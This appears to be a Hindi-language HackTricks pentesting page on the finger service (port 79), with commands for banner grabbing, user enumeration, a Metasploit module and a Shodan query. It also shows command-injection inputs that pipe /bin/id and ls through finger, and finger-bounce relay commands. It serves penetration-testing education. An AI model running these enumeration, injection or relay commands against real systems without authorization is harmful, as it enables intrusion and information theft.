# 79 - पेंटेस्टिंग फिंगर
AWS हैकिंग सीखें शून्य से लेकर हीरो तक htARTE (HackTricks AWS रेड टीम एक्सपर्ट) के साथ! HackTricks का समर्थन करने के अन्य तरीके: * यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें * [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एक्सक्लूसिव [**NFTs**](https://opensea.io/collection/the-peass-family) का संग्रह * 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram समूह**](https://t.me/peass) में या **Twitter** 🐦 पर **मुझे फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.** * **अपनी हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपोज में.
## **मूल जानकारी** **फिंगर** एक प्रोग्राम है जिसका उपयोग आप कंप्यूटर उपयोगकर्ताओं के बारे में जानकारी खोजने के लिए कर सकते हैं। यह आमतौर पर लॉगिन नाम, पूरा नाम, और संभवतः उपयोगकर्ता के बारे में अन्य विवरण सूचीबद्ध करता है जिसे आप फिंगर कर रहे हैं। इन विवरणों में कार्यालय का स्थान और फोन नंबर (यदि ज्ञात हो), लॉगिन समय, निष्क्रिय समय, मेल अंतिम बार कब पढ़ा गया था, और उपयोगकर्ता की योजना और प्रोजेक्ट फाइलें शामिल हो सकती हैं। **डिफ़ॉल्ट पोर्ट:** 79 ``` PORT STATE SERVICE 79/tcp open finger ``` ## **गणना** ### **बैनर ग्रैबिंग/मूल संबंध** ```bash nc -vn 79 echo "root" | nc -vn 79 ``` ### **उपयोगकर्ता सूचीकरण** ```bash finger @ #List users finger admin@ #Get info of user finger user@ #Get info of user ``` वैकल्पिक रूप से आप [**pentestmonkey**](http://pentestmonkey.net/tools/user-enumeration/finger-user-enum) से **finger-user-enum** का उपयोग कर सकते हैं, कुछ उदाहरण: ```bash finger-user-enum.pl -U users.txt -t 10.0.0.1 finger-user-enum.pl -u root -t 10.0.0.1 finger-user-enum.pl -U users.txt -T ips.txt ``` #### **Nmap डिफ़ॉल्ट स्क्रिप्ट्स का उपयोग करके स्क्रिप्ट निष्पादित करता है** ### Metasploit Nmap की तुलना में अधिक तरकीबें उपयोग करता है ``` use auxiliary/scanner/finger/finger_users ``` ### Shodan * `port:79 USER` ## आदेश निष्पादन ```bash finger "|/bin/id@example.com" finger "|/bin/ls -a /@example.com" ``` ## फिंगर बाउंस [एक सिस्टम को फिंगर रिले के रूप में उपयोग करें](https://securiteam.com/exploits/2BUQ2RFQ0I/) ``` finger user@host@victim finger @internal@external ```
AWS हैकिंग सीखें शून्य से लेकर हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ! HackTricks का समर्थन करने के अन्य तरीके: * यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें * [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह * 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** पर 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm) को **फॉलो करें**. * **HackTricks** के [**github repos**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके अपनी हैकिंग ट्रिक्स शेयर करें।